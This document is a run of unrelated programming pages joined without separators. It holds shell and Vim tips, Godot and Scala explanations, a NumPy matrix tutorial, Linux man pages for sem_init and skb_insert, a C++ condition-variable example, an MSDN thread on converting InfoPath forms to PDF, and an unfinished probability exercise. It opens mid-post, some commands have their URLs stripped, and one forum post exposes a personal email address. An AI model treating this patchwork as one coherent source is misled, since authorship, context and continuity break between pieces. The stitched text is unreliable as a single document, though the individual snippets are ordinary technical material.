You do that in bash using<br /><pre><code>set -e</code></pre>and in zsh using<br /><pre><code>setopt err_exit</code></pre>So your script would essentially look like this:<br /><pre><code>#!/bin/bash<br />set -e<br />make<br />make test<br />make push</code></pre>zsh also has a <code>err_return</code> option that can be set to make a function return (as opposed to terminating the whole script) when a command invoked by a function fails.<img src="" height="1" width="1" alt=""/>Muthu Kannan's text objects<div dir="ltr" style="text-align: left;" trbidi="on">Let's say I have this line in a file:<br /><blockquote><pre><code>logging.info("some boring message")</code></pre></blockquote>and I want to change it to:<br /><blockquote><pre><code>logging.info("request served")</code></pre></blockquote>For a long time I did it this way:<br />1. keep the cursor on '<code>s</code>' of '<code>some</code>'<br />2. type <kbd>ct"</kbd> (which means change till (the first) <code>"</code> character)<br />3. type <kbd>request served</kbd>.<br /><br />Recently I figured there's an easier/faster way:<br />1. keep the cursor anywhere inside the <code>"some boring message"</code> string<br />2. type <kbd>ci"</kbd> (which means change <i>inside quotes</i>)<br />3. type <kbd>request served</kbd>.<br /><br />Like every Vim feature, this is just one among a dozen or so possible selections. Check out <a href="">text objects</a> section in Vim manual.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan key to switch to any app<div dir="ltr" style="text-align: left;" trbidi="on">I :)<br /><br />I had to install <code>wmctrl</code> first (<code>sudo apt-get install wmctrl</code> on Ubuntu). And then I bound the shortcut key <kbd>Ctrl+Shift+K</kbd> from my KDE's settings dialog to run the command <code>wmctrl -x -a konsole.Konsole</code>. <code>-x</code> says that I would be specifying windows using their WM_CLASS values; <code>-a</code> activates the window that follows it. 
To get the list of currently open window with their WM_CLASS values, I used the command <code>wmctrl -xl</code>.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan information about commands you use<div dir="ltr" style="text-align: left;" trbidi="on"><b>Q</b>: How to find out where the binary of a command I'm running?<br /><b>A</b>: You can use <i>type</i> command (available on both zsh and bash):<br /><pre><code>% type ls<br />ls is an alias for ls -h --color=auto<br />% type cat<br />cat is /bin/cat<br />% type alias<br />alias is a shell builtin</code></pre><br /><b>Q</b>: Sometimes I want to know if a command is a shell script or a compiled binary. How do I do that?<br /><b>A</b>: If you use zsh, you can use <i>=command</i> to get to <i>command</i>'s full path.<br /><pre><code>% file =backup<br />/home/manki/d/bin/backup: a /bin/rbash script text executable<br />% # To show you what =backup actually translates to</code><code><br />% echo =backup<br />/home/manki/d/bin/backup<br /></code></pre>If you use bash, you can use type command within <a href="">backticks</a> or the equivalent $(...).<br /><pre><code>$ file `type -p backup`<br />/home/manki/d/bin/backup: a /bin/rbash script text executable</code></pre>When you have aliases, this can get tricky. On bash I don't know how to do this, but zsh is smart enough to find the executable even when you have aliases set up. For instance, I have aliased <i>ls</i> to <i>ls -h --color=auto</i>, but zsh gives me the right binary for <i>=ls</i>:<br /><pre><code>% file =ls <br />/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped</code></pre><br /></div><img src="" height="1" width="1" alt=""/>Muthu Kannan the input to `less' command<code>less</code> is good for viewing long outputs from other programs. 
There may be times when you pipe the output of a program to <code>less</code> and realise only later that you want the output in a file... maybe because you need to send the output to someone via email.<br /><br />You can quit <code>less</code> and change the command line to output to a file. But there are better/faster options. <code>less</code> supports an <a href=""><code>s</code> command</a> to save its input to a file. Just press <code>s</code>, enter a file path to save the text to, and you're done.<img src="" height="1" width="1" alt=""/>Muthu Kannan Apple's Keynote Videos in Linux<div dir="ltr" style="text-align: left;" trbidi="on">Essentially, you’d have to dig through Apple site’s HTML/JavaScript and find the video URL for Windows. And then pass that URL to a stand-alone media player like VLC.<br /><br />Apparently Chrome for Linux has a QuickTime plugin! (Or it’s bundled with Ubuntu; I am not sure.) Watch <a href="">Sep 2012</a> event (iPhone 5 launch) is available at <a href="">goo.gl/Nn77F</a>.<br /><br />Watch <a href="">Mar 7, 2012 iPad event</a> video using this command:<br /><pre style="overflow-x: scroll;"><code>vlc ''</code></pre><br />Watch <a href="">Oct 4, 2011 iPhone event</a> video using this command:<br /><pre style="overflow-x: scroll;"><code>vlc ''</code></pre>----- <br />If you have a Linux computer, you cannot watch Apple’s WWDC 2011 keynote video from <a href="">Apple’s web site.</a> Because the site picks a video URL based on what your browser/OS is, but it fails miserably if you don’t run an Apple OS or Windows. So, if you want to see the video, open <a href=""></a> on VLC Media Player and you’ll be good.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan
Godot scenes and scripts are classes
In Godot, scripts and scenes can both be the equivalent of classes in an Object-Oriented programming language. The main difference is that scenes are declarative code, while scripts can contain imperative code.
As a result, many best practices in Godot boil down to applying Object-Oriented design principles to the scenes, nodes, or script that make up your game.
This guide explains how scripts and scenes work in the engine's core, to help you get a sense of how Godot works under the hood, and to help you better understand where some of this series' best practices come from.
Making sense of classes in Godot
Godot Engine provides built-in classes like Node, and user-created types extend them. At runtime, the engine registers every class in a database called ClassDB, which records each class's:

- Properties
- Methods
- Constants
- Signals
ClassDB is what Objects check against when performing an operation like
accessing a property or calling a method.
ClassDB checks the database's
records and the records of the Object's base types to see if the Object supports
the operation.
On the engine's side, every class defines a static
_bind_methods() function
that describes what C++ content it registers to the database and how. When you
use the engine, you can extend the methods, properties, and signals available from
the
ClassDB by attaching a Script to your node.
Objects check their attached script before the database. This is why scripts can
override built-in methods. If a script defines a
_get_property_list() method,
Godot appends that data to the list of properties the Object fetches from the
ClassDB. The same is true for other declarative code.
Even scripts that don't inherit from a built-in type, i.e. scripts that don't
start with the
extends keyword, implicitly inherit from the engine's base
Reference class. This allows the Object to defer
to the script's content where the engine logic deems appropriate.
Note
As a result, you can instance scripts without the
extends keyword
from code, but you cannot attach them to a Node
Scripting performances and PackedScene
As the number and size of Objects increases, the amount of script code needed to create them grows much larger. Creating node hierarchies demonstrates this: each individual Node's logic could run to several hundred lines of code.
Let's see a simple example of creating a single
Node as a child. The code
below creates a new
Node, changes its name, assigns a script to it, sets its
future parent as its owner so it gets saved to disk along with it, and finally
adds it as a child of the
Main node:
# Main.gd
extends Node

func _init():
    var child = Node.new()
    child.name = "Child"
    child.script = preload("Child.gd")
    child.owner = self
    add_child(child)
using System;
using Godot;

namespace ExampleProject
{
    // Must derive from Node (not Resource): Owner and AddChild are Node members.
    public class Main : Node
    {
        public Node Child { get; set; }

        public Main()
        {
            Child = new Node();
            Child.Name = "Child";
            Child.Script = (Script)ResourceLoader.Load("child.gd");
            Child.Owner = this;
            AddChild(Child);
        }
    }
}
Script code like this is much slower than engine-side C++ code. Each change makes a separate call to the scripting API which leads to many "look-ups" on the back-end to find the logic to execute.
Scenes help to avoid this performance issue. PackedScene, the base type that scenes inherit from, is a resource that uses serialized data to create objects. The engine can process scenes in batches on the back-end and provide much better performance than scripts.
Scenes and scripts are objects
Why is any of this important to scene organization? Because scenes are objects. One often pairs a scene with a scripted root node that makes use of the sub-nodes. This means that the scene is often an extension of the script's declarative code.
The content of a scene helps to define:
- What nodes are available to the script
- How they are organized
- How they are initialized
- What signal connections they have with each other
Many Object-Oriented principles which apply to written code also apply to scenes.
The scene is always an extension of the script attached to its root node. You can see all the nodes it contains as part of a single class.
Most of the tips and techniques explained in this series will build on this.
As a first step into learning Scala and as one who is familiar with Java, let us compare the customary Helloworld programs in Java and Scala. You might already know that to run a Java program, there must be a public class with a main method that takes one parameter, a String[ ], and has a void return type.
For example:
package javaapplication;

public class Main {
    public static void main(String[] args) {
        System.out.println("Hello World");
    }
}
In Scala, an equivalent program looks something as follows –
package scalaapplication

object Main {
  def main(args: Array[String]): Unit = {
    println("Hello World")
  }
}
The output of both of the above programs is to print out Hello World. We compare and contrast the first programs in Java and Scala as follows:
- Both programs begin with a package declaration. In Java, every statement ends with a semicolon; in Scala, the semicolon is optional. The Scala compiler treats a newline as the end of one statement and the beginning of the next, so a semicolon is required only when multiple statements are written on a single line.
- While import statement is not shown in the above simple programs, they can both be part of a program in Java as well as Scala. Scala provides an easier and more concise way to import multiple statements as we will see in a later post.
- The major contrast between the two programs is that while the Java program has a class declaration, the Scala program has an object declaration.
Conceptually, a class is a blueprint for objects. An object is a concrete instance of a class.
In Java, we create an object using the new keyword followed by the class name. In Scala, we can directly define an object as shown above. We can also, of course, define classes and create objects using new keyword as in Java. The reason why we have defined an object instead of a class in the equivalent Scala program is described in a short while.
- Before we move on, in both programs, the Java class and the Scala object are public. In Java, the modifier named public needs to be used to mark a class/class member as public. In Scala, by default a class/class member is public. That is, when there is no access modifier, it means that the class/class member has public access.
- Main Methods are defined in very similar yet different ways in Java and Scala programs. An illustration for the main method definitions as they compare with each other in the two languages follows -
def is the keyword that marks the beginning of any function definition in Scala. There is no such equivalent keyword in Java. The main point of difference is the absence of the static keyword in the Scala main method definition.
As Scala is a purely object oriented language, there are no static things in Scala. Nevertheless, in order to achieve a similar behavior, Scala allows defining of something called as singleton objects. Just for now, a singleton object is one which looks like a class definition but with keyword object instead of class. In the above Scala program, Main is a standalone singleton object. To put it simplistically, for a Java programmer, a singleton object in Scala, is an equivalent holder of static methods if it were Java. So, now we know why we have defined an object in the above Scala program instead of a class.
The next important thing that can be noticed is the keyword ‘Unit‘ in the Scala main method definition. Unit is a return type for a function. Unit is used as a result type in a method, if all the method does is produce a side effect and not return any specific value as such. In our case, the side effect is printing out “Hello World”.
- Both the programs use curly braces to mark the beginning and end of method or class.
- While Java implicitly imports members of the package java.lang into every Java source file, Scala implicitly imports members of the packages java.lang and scala as well as members of the singleton object named Predef into every Scala source file.
The println method call in the Scala example above is actually made on Predef.
- In Java, a public class must be in a file of the same name. In contrast, a public Scala class need not be in a file of the same name, though it is strongly recommended to keep it in one so that programmers can locate classes easily.
- Now, lets try and run the above programs at the command prompt.
Java :
$ javac Main.java
$ java Main
Hello World
Scala:
$ scalac Main.scala
$ scala Main
Hello World
As we can see, running the programs in the two languages is pretty similar. The output of a java compiler as well as a scala compiler is a Java class file. This class file can then run on the same JVM to produce the output
Hello World
|
NumPy is a popular Python library that offers a range of powerful mathematical functions. The library is widely used in quantitative fields, such as data science, machine learning, and deep learning. We can use NumPy to perform complex mathematical calculations, such as matrix multiplication.
Matrix multiplication can help give us quick approximations of very complicated calculations. It can help us with network theory, linear systems of equations, population modeling, and much more. In this tutorial, we’ll explore some basic computations with NumPy matrix multiplication.
Let’s get started!
We’ll cover:
Get hands-on with NumPy for free.
Learn the fundamentals of Python data analysis with Educative’s 1-week free trial.
Python Data Analysis and Visualization
NumPy is an open-source Python library that we can use to perform high-level mathematical operations with arrays, matrices, linear algebra, Fourier analysis, and more. The NumPy library is very popular within scientific computing, data science, and machine learning, and it is compatible with popular data science libraries like pandas, matplotlib, and Scikit-learn. It is much faster than plain Python lists because its core routines are implemented in compiled C code and operate on whole arrays at once rather than element by element.
Before we get started, let’s make sure we have NumPy installed. If you already have Python, you can install NumPy with one of the following commands:
conda install numpy
or
pip install numpy
To import NumPy into our Python code, we can use the following command:
import numpy as np
import numpy as np

A = [[6, 7], [8, 9]]
print(np.array(A)[0, 0])
In the above code, we have matrix A
[[6, 7], [8, 9]]. We ask for the element given at
(0,0), and our output returns
6. When we want to define the shape of our matrix, we use the number of rows by the number of columns. That means that matrix A has a shape of 2x2.
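The shape can also be checked directly through the array's .shape attribute; a quick sketch:

```python
import numpy as np

A = np.array([[6, 7], [8, 9]])

# .shape is a (rows, columns) tuple, so a 2x2 matrix reports (2, 2)
print(A.shape)
```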
Now, let’s take a look at some different NumPy matrix multiplication methods.
There are three main ways to perform NumPy matrix multiplication:
np.dot(array a, array b): returns the scalar or dot product of two arrays
np.matmul(array a, array b): returns the matrix product of two arrays
np.multiply(array a, array b): returns the element-wise matrix multiplication of two arrays
Let’s take a closer look at each of the three methods:
Scalar multiplication is a simple form of matrix multiplication. A scalar is just a number, like
1,
2, or
3. In scalar multiplication, we multiply a scalar by a matrix. Each element in the matrix is multiplied by the scalar, which makes the output the same shape as the original matrix.
With scalar multiplication, the order doesn’t matter. We’ll get the same result whether we multiply the scalar by the matrix or the matrix by the scalar.
Let’s take a look at an example:
import numpy as np

A = 5
B = [[6, 7], [8, 9]]
print(np.dot(A, B))
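The claim that order doesn't matter for scalar multiplication is easy to verify; a small sketch:

```python
import numpy as np

A = 5
B = np.array([[6, 7], [8, 9]])

# Scalar-times-matrix and matrix-times-scalar give the same result
left = np.dot(A, B)
right = np.dot(B, A)
print(np.array_equal(left, right))
```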
Now, let’s multiply a 2-dimensional matrix by another 2-dimensional matrix. When multiplying two matrices, the order matters. That means that matrix A multiplied by matrix B is not the same as matrix B multiplied by matrix A.
Before we get started, let’s look at a visual for how the multiplication is done.
import numpy as np

A = [[6, 7], [8, 9]]
B = [[1, 3], [5, 7]]
print(np.dot(A, B))
print("----------")
print(np.dot(B, A))
Note: It’s important to note that we can only multiply two matrices if the number of columns in the first matrix is equal to the number of rows in the second matrix.
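The rule in the note can be demonstrated with mismatched shapes; when the inner dimensions disagree, NumPy raises a ValueError instead of producing a result:

```python
import numpy as np

A = np.ones((2, 3))  # 2 rows, 3 columns
B = np.ones((3, 4))  # 3 rows, 4 columns

# Inner dimensions match (3 == 3), so the product exists with shape (2, 4)
product = np.dot(A, B)
print(product.shape)

# Reversed, the inner dimensions are 4 and 2, so multiplication fails
try:
    np.dot(B, A)
except ValueError as err:
    print("shapes not aligned:", err)
```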
The
matmul() function gives us the matrix product of two 2-d arrays. With this method, we can’t use scalar values for our input. If one of our arguments is a 1-d array, the function converts it into a matrix by appending a 1 to its dimension. This is removed after the multiplication is done.
If one of our arguments is greater than 2-d, the function treats it as a stack of matrices in the last two indexes. The matmul() method is great for times when we're unsure of what the dimensions of our matrices will be.
Let’s look at some examples:
Multiplying a 2-d array by another 2-d array
import numpy as np

A = [[2, 4], [6, 8]]
B = [[1, 3], [5, 7]]
print(np.matmul(A, B))
Multiplying a 2-d array by a 1-d array
import numpy as np

A = [[5, 0], [0, 5]]
B = [5, 2]
print(np.matmul(A, B))
One array with dimensions greater than 2-d
import numpy as np

A = np.arange(8).reshape(2, 2, 2)
B = np.arange(4).reshape(2, 2)
print(np.matmul(A, B))
The multiply() function gives us the element-wise product of two arrays. Let's look at an example:
import numpy as np

A = np.array([[1, 3, 5, 7, 9], [2, 4, 6, 8, 10]])
B = np.array([[1, 2, 3, 4, 5], [5, 4, 3, 2, 1]])
print(np.multiply(A, B))
We can pass certain rows, columns, or submatrices to the numpy.multiply() method. The sizes of the rows, columns, or submatrices that we pass as our operands should be the same. Let's look at an example:
import numpy as np

A = np.array([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]])
B = np.array([[11, 12, 13, 14, 15], [16, 17, 18, 19, 20]])
print(np.multiply(A[0, :], B[1, :]))
print("----------")
print(np.multiply(A[1, :], B[0, :]))
Congrats on taking your first steps with NumPy matrix multiplication! It's a complicated, yet important part of linear algebra. It helps us further our understanding of different aspects of data science, machine learning, deep learning, and other prevalent fields. There's still a lot more to learn about NumPy and matrices.
To get started learning these concepts and more, check out Educative’s learning path Python Data Analysis and Visualization. This hands-on learning path will help you master the skills to extract insights from data using a powerful assortment of popular Python libraries.
Happy learning!
https://www.educative.io/blog/numpy-matrix-multiplication
sem_init − initialize an unnamed semaphore
#include <semaphore.h>
int sem_init(sem_t *sem, int pshared, unsigned int value);
Link with −pthread.
sem_init() initializes the unnamed semaphore at the address pointed to by sem. The value argument specifies the initial value for the semaphore. The pshared argument indicates whether this semaphore is to be shared between the threads of a process, or between processes.
Initializing a semaphore that has already been initialized results in undefined behavior.
sem_init() returns 0 on success; on error, −1 is returned, and errno is set to indicate the error.
For an explanation of the terms used in this section, see attributes(7).
POSIX.1-2001.
Bizarrely, POSIX.1-2001 does not specify the value that should be returned by a successful call to sem_init(). POSIX.1-2008 rectifies this, specifying the zero return on success.
sem_destroy(3), sem_post(3), sem_wait(3), sem_overview(7)
This page is part of release 3.53 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at−pages/.
http://man.linuxtool.net/centos7/u3/man/3_sem_init.html
From: Caleb Epstein (caleb.epstein_at_[hidden])
Date: 2005-02-16 10:44:20
On Tue, 15 Feb 2005 23:11:49 -0500, Jason Hise <chaos_at_[hidden]> wrote:
>
> From everything I know, cin, cout, cerr, and clog are simply global
> variables that live in namespace std. Does this mean that the following
> code is dangerous?
AFAIK yes. If you have a singleton object that is being destroyed at
exit, it is possible that cin/cout/clog etc have been closed before
Log::~Log is called.
> class Log
> {
> public:
> Log ( ) { std::clog << "Log created\n"; }
> ~ Log ( ) { std::clog << "Log destroyed\n"; }
> } global_log;
>
> If so, (and I know this is presumptuous, so strictly hypothetically
> speaking) could these four standard streams benefit by becoming
> singletons? Just a thought experiment...
--
https://lists.boost.org/Archives/boost/2005/02/80534.php
Machine Learning Model as a Serverless App using Google App Engine | by Saed Hussain | Jan, 2021
Create a folder for the project and download the code files for this article from the repository here.
Then navigate to this directory using the terminal (cd <path_to_dir>) and make sure that the virtual environment is active (conda activate <env_name>).
Obviously, you can do the same using your favorite IDE. But make sure to activate a virtual environment (click here for VS Code). Otherwise, you will end up installing dependencies in your default environment, which could break other projects using that environment.
Now let’s take a look at the Streamlit app file (app.py).
Notice how, by adding a simple import (import streamlit as st), a regular data science script (with pandas, numpy, model.predict(), etc.) gets converted into a Streamlit web app. All we have done is add Streamlit widgets to interact with the model, such as a text input widget, a button widget, etc.
You can try running the example Streamlit app in the newly created virtual environment using streamlit run app.py.
This should result in errors due to missing python modules in the virtual environment. You can use
pip install to install the missing modules one by one, as you encounter them until the app finally runs.
Or, you can install all the dependencies of the app, by using the dependency list in requirements.txt, which will replicate my environment in which the app was created and tested.
Install all the project dependencies into the virtual environment using the command pip install -r requirements.txt.
You can create a dependency list like this for your own project, once completed, by running pip freeze > requirements.txt.
Give some time for the installation of the modules to complete. When it's done, you can run the Streamlit app in the virtual environment using the streamlit run app.py command.
You should see your default browser pop up and display the app (on localhost, usually port 8501 by default). Feel free to play around with the numbers and see the model work.
Congratulations, you have built a web app in minutes to interact with a machine learning model! 😄
When you are done playing with the Streamlit app, you can shut the app server down using Ctrl + C in the terminal.
https://openbootcamps.com/machine-learning-model-as-a-serverless-app-using-google-app-engine-by-saed-hussain-jan-2021/
A condition variable is used to block a thread until it is "notified" to wake up.
To use condition variables, we need to include the header below:
#include <condition_variable> // std::condition_variable
The wait functions are wait(), wait_for(), and wait_until(). The notify functions are notify_one() and notify_all().
Suppose you have a bank account with 0 balance. In such a case, if a withdraw and a deposit request come at the same time, the withdraw request will need to wait until the deposit happens.
In such cases, the withdraw thread can wait, and after the deposit, the deposit thread can notify the withdraw thread to withdraw money.
Now let us understand with the help of an example:
Example:
In the below example, I have created two functions: deposit() and withdraw().
In the main() function, we call withdraw() first; as the initial balance is 0, it will wait until the deposit occurs.
Then we call the deposit() function; it will deposit the money.
Then we notify the waiting thread.
Then withdraw() proceeds, and the amount is withdrawn.
#include <iostream>            // std::cout
#include <thread>              // std::thread
#include <mutex>               // std::mutex
#include <condition_variable>  // std::condition_variable

using namespace std;

std::condition_variable cv;
std::mutex mtx;
int balance = 0;

void deposit(int money)
{
    std::lock_guard<mutex> lg(mtx);
    balance = balance + money;
    cout << "The current balance is " << balance << endl;
    cv.notify_one();
}

void withdraw(int money)
{
    std::unique_lock<mutex> ul(mtx);
    cv.wait(ul, [] { return balance != 0; });
    if (balance >= money)
    {
        balance -= money;
        cout << "The amount has been withdrawn" << endl;
    }
    else
    {
        cout << "The current balance is less than the amount" << endl;
    }
    cout << "The current balance is " << balance << endl;
}

int main()
{
    std::thread t1(withdraw, 400);
    std::thread t2(deposit, 600);
    t1.join();
    t2.join();
    return 0;
}
Output:
The current balance is 600
The amount has been withdrawn
The current balance is 200
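For comparison only (this Python analog is not part of the original C++ tutorial), the same wait/notify pattern can be sketched with Python's threading.Condition, which bundles the mutex and the condition variable into one object:

```python
import threading

condition = threading.Condition()
balance = 0

def deposit(money):
    global balance
    with condition:                # acquire the lock
        balance += money
        print("The current balance is", balance)
        condition.notify()         # wake up a waiting withdraw thread

def withdraw(money):
    global balance
    with condition:
        # Releases the lock while waiting; wakes when balance != 0.
        condition.wait_for(lambda: balance != 0)
        if balance >= money:
            balance -= money
            print("The amount has been withdrawn")
        else:
            print("The current balance is less than the amount")
        print("The current balance is", balance)

t1 = threading.Thread(target=withdraw, args=(400,))
t2 = threading.Thread(target=deposit, args=(600,))
t1.start()
t2.start()
t1.join()
t2.join()
```

As in the C++ version, the final balance is 200 regardless of which thread runs first.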
https://www.prodevelopertutorial.com/c-11-feature-c-multithreading-chapter-10-conditional-variables-in-c-threading/
Catalyst::Utils - The Catalyst Utils
Catalyst Utilities.

MyApp::Controller::Foo::Bar becomes /tmp/my/app/c/foo/bar
Returns a list of files which can be tested to check if you're inside a checkout
Returns home directory for given class.
Note that the class must be loaded for the home directory to be found using this function.
Tries to determine if $path (or cwd if not supplied) looks like a checkout. Any leading lib or blib components will be removed, then the directory produced will be checked for the existence of a dist_indicator_file_list(). If one is found, the directory will be returned, otherwise false.
Returns a prefixed action.
MyApp::Controller::Foo::Bar, yada becomes foo/bar/yada
Returns an HTTP::Request object for a uri.
Method which adds the namespace for plugins and actions.
__PACKAGE__->setup(qw(MyPlugin)); # will load Catalyst::Plugin::MyPlugin
Catalyst Contributors, see Catalyst.pm
This library is free software. You can redistribute it and/or modify it under the same terms as Perl itself.
http://search.cpan.org/~mstrout/Catalyst-Runtime-5.90010/lib/Catalyst/Utils.pm
Asked by:
How to convert an infopath file pdf
Question
All replies
Thanks micvos. Finally I got a reply from this forum. This is the first time I have had to wait many days for a reply in this forum.
Thanks for your help. Let me give some more details. InfoPath form templates have the .xsn extension, but when we fill in the form and save it, it is stored as .xml.
Can you suggest any method for converting this .xml (with its XSL) to PDF?
I already got one add-in from Microsoft which can do the same. But I want to do it on a button click. This is not possible with the add-in, because we need to go to the File menu and click on the 'Export to PDF' option.
I am now thinking of using Crystal Reports for the same. Can you give any input?
thanks in advance...
akjal
Hi
You can get help regarding how to add the Form Control to a Visual Studio 2005 project at this link.
Install the 2007 Microsoft Office Add-in: Microsoft Save as PDF or XPS; you can get the add-in from this link.
After adding the FormControl to the Windows application and installing the Microsoft add-in:
This code helps to convert the InfoPath (*.xml) file to PDF.
using Microsoft.Office.InfoPath;
using Microsoft.Office.InfoPath.FormControl;

// file refers to the source file path
// finalFileName is the destination file path
FormControl1.Open(file);
MessageBox.Show("Confirm exporting document " + finalFileName);
FormControl1.XmlForm.CurrentView.Export(finalFileName + ".pdf", Microsoft.Office.InfoPath.ExportFormat.Pdf);
Instead of PDF, there are two other options available:
XPS: Microsoft.Office.InfoPath.ExportFormat.Xps
MHT: Microsoft.Office.InfoPath.ExportFormat.Mht
Hi Mikedopp,
By default there is no option to convert an InfoPath file to PDF, so Microsoft provides an add-in to overcome the issue. You can download the 2007 Microsoft Office Add-in: Microsoft Save as PDF or XPS from this link.
Once you have installed it, there is an option in the File menu, Export to PDF and XPS, in InfoPath 2007.
Programmatic Approach
Add the Form Control to Windows Application
The Form control is a COM object, so by default it will not be available in the toolbox. So the first step is to add the Form control to the toolbox under the General tab.
Below are the steps to add a FormControl to the toolbox.
1) Toolbox -> go to the General tab -> right click on it
2) Select Choose Items; you will get a window (Choose Toolbox Items); click the Browse button
3) Go to the path ("E:\Program Files\Microsoft Office\Office12"); most probably this is the path, otherwise go to the location where Office 2007 is installed
4) There you can find Microsoft.Office.InfoPath.FormControl.dll; select the dll
5) Now you can find the FormControl under the .NET Framework Components tab (select the FormControl and click OK)
6) You can see FormControl in the General tab.
7) Drag and drop it into the Windows application
In the Button click Event
1) FormControl1.Open(SourceInfopath) (i.e., opening an InfoPath form in the FormControl)
2) Application.DoEvents() (try with Application.DoEvents(); if you get an error like "View is not ready", then place a MessageBox and just pop up some message)
3) FormControl1.XmlForm.CurrentView.Export(DestinationPath, Microsoft.Office.InfoPath.ExportFormat.Pdf)
You may ask what the use of the second line is. Here is where the trick lies: the FormControl is a COM object and it takes time to load, so we are giving it time to complete the form-load operation (by calling DoEvents() or by prompting a MessageBox). FormControl1.Open() doesn't return anything, so we don't have any way to know whether the FormControl has loaded the InfoPath form.
Most of us can get the "View is not ready" error because of the above reason: the FormControl takes time to load, and within that period we may attempt the export operation. To avoid the error, use the approach above.
If someone finds a better way of tackling this error, let me know.
Thanks
coolmadhan123
A low tech way to convert an Infopath file to pdf is to copy & paste the form into MS Word, "save as" html then use Adobe Acrobat to convert the new file to a pdf. Most of the fields function properly and save properly. You may need to add text boxes since those don't seem to carry over. This method is a little cumbersome and not real fast but does work. If your form is large, you may need to copy and paste into several smaller documents. But you can combine them in the final Acrobat version.
- So let me clarify just for my understanding. I will need to create an ActiveX/COM component to do the saving as a PDF? Also, is there a way to use the submit button to export/save the PDF programmatically to a SharePoint URL?
Once again thank you for your all your help.
Forgive my lack of knowledge of this.
Mike
- OK, so in reply to my own question. Here is a better way, without an ActiveX COM object.
I know, I am sorry for the JScript, but here it goes.
Add this to the OnClick event and have full trust enabled.
{
XDocument.View.Export("C:\\MyView.pdf", "PDF");
}
More at
Hi,
You may use any image capturing program, such as SNAGIT
AbuAhmed
hello there,
I had the same problem with InfoPath to PDF conversion. I tried to use the Microsoft Save as PDF or XPS add-in, but I had a lot of problems with page breaks, positioning of elements, tables, etc. I also tried to use the XSLT extracted from the XSN file to convert it to HTML and then to PDF; this was too complicated and I had some weird results. I also tried external components (I tried everything that Google returns from a search :) ). The thing is that all these methods are good for small and uncomplicated InfoPath forms. My form printout has up to 100 pages, a lot of pictures, attachment tables, and runtime-evaluated expression boxes (for multilanguage support). Finally I used InfoPathToPdf.exe from a-pdf, and I just run it from my code. It uses just a virtual printer and InfoPath; maybe it is not so elegant, but it works! I find it the best solution for InfoPath to PDF conversion on the market, and it costs about $30.
This code has worked for me. I added a button called "Print" to my InfoPath form and programmed the following against it (VB.Net):
Public Sub Print_Clicked(ByVal sender As Object, ByVal e As ClickedEventArgs)
    Dim filename As String
    Dim nameNode As XPathNavigator
    nameNode = MainDataSource.CreateNavigator().SelectSingleNode("insert the XPath to the field on which you want the name of the pdf based on", NamespaceManager)
    filename = nameNode.Value + ".pdf"
    Me.CurrentView.Export("C:\" + filename, ExportFormat.Pdf)
End Sub
- Batch print InfoPath Forms using the PDF Converter for SharePoint
- Converting InfoPath forms including all attachments to a single PDF file
- Controlling which views to export to PDF format in InfoPath
- Using SharePoint Forms Services to convert InfoPath forms to PDF format
- Converting Office files to PDF Format using a Web Services based interface
- Using the PDF Converter from a SharePoint workflow
Hi Micvos
I am having a problem converting an InfoPath template to XML using VSTA.
One other question: if I want to convert a preprinted form (i.e., any paper form which I have scanned and imported into InfoPath), how do I edit that one or directly convert it to XML?
Thanks.
If you have some material, mail me at lala.waghmode@gmail.com
I don't know the code-based method; maybe there is a proper one that can fix the problem.
I just want to show my way to export as a PDF file. I think the "Save as PDF/XPS" feature can't deal with InfoPath so well when there are many tables, images, and so on. So you can use a print driver, PDF Creator, since InfoPath files are printable. In the print dialog, choose PDF Creator as the virtual printer and tick the "print to file" checkbox.
Then it will be added to PDF Creator and you can further define settings like security and compression to get the expected files. Then wait for the output to open in Adobe Reader.
Of course, capturing it as an image file and then exporting to a PDF file is also feasible with the creator, but it's time-consuming if you have a bunch of files to go through.
Never too old to learn
- For something like this why not just print it to cutepdf or pdf creator?
- Proposed as answer by Derek.Wilkes Tuesday, July 05, 2011 11:42 AM
Hi motnis,
If you are trying to generate a PDF from the XML, you could use the iText library to generate your PDF on the fly.
The basic logic will be:
- Parse your InfoPath XML
- Process the XML to generate a PDF with the iTextPDF library
Hope this helps.
Kind regards,
- Install Solid PDF Reader and print to pdf while in infopath
- Proposed as answer by Derek.Wilkes Tuesday, July 05, 2011 11:42 AM
- Try. This application quickly converts InfoPath to PDF, and supports batch jobs.
https://social.msdn.microsoft.com/Forums/vstudio/en-US/9f43f377-dfd6-4c6e-a361-315bf30f3c91/how-to-convert-an-infopath-file-pdf?forum=csharpgeneral
__skb_insert, skb_insert, skb_append - insert an sk_buff into a list
#include <linux/skbuff.h>

void __skb_insert(struct sk_buff *newsk, struct sk_buff *prev, struct sk_buff *next, struct sk_buff_head *list);
void skb_insert(struct sk_buff *old, struct sk_buff *newsk);
void skb_append(struct sk_buff *old, struct sk_buff *newsk);
skb_insert and skb_append are essentially wrapper functions for __skb_insert (see NOTES, below). __skb_insert inserts newsk into list, and resets the appropriate next and prev pointers. prev and next are used to frame newsk in list. After setting the next and prev pointers in newsk, __skb_insert sets the prev pointer in next and the next pointer in prev, sets the list pointer in newsk, and increments the qlen counter in list. skb_insert and skb_append should be used to add sk_buffs to a list rather than performing this task manually; in addition to performing this task in a standardized way, these functions also provide for interrupt disabling and prevent list mangling. Both of these functions use the list pointer in old to determine to which list newsk should be attached. The skb_insert function adds newsk to the list before old. The skb_append function adds newsk to the list after old.
None.
It is important to note the difference between not only skb_insert, skb_append and __skb_insert, but all the __skb_ functions and their skb_ counterparts. Essentially, the __skb_ functions are non-atomic, and should only be used with interrupts disabled. As a convenience, the skb_ functions are provided, which perform interrupt disable/enable wrapper functionality in addition to performing their specific tasks.
Linux 1.0+
intro(9), skb_queue_head(9), skb_queue_tail(9) /usr/src/linux/net/ax25/af_ax25.c /usr/src/linux/net/core/skbuff.c /usr/src/linux/net/ipv4/tcp_input.c /usr/src/linux/net/netrom/nr_in.c
Cyrus Durgin <cider@speakeasy.org>
http://www.linuxsavvy.com/resources/linux/man/man9/skb_insert.9.html
import numpy as np
Suppose you are having a dinner party with 10 guests and 4 of them are allergic to cats. Because you have cats, you expect 50% of the allergic guests to sneeze during dinner. At the same time, you expect 10% of the non-allergic guests to sneeze. What is the distribution of the total number of guests who sneeze?
# Solution goes here
# Solution goes here
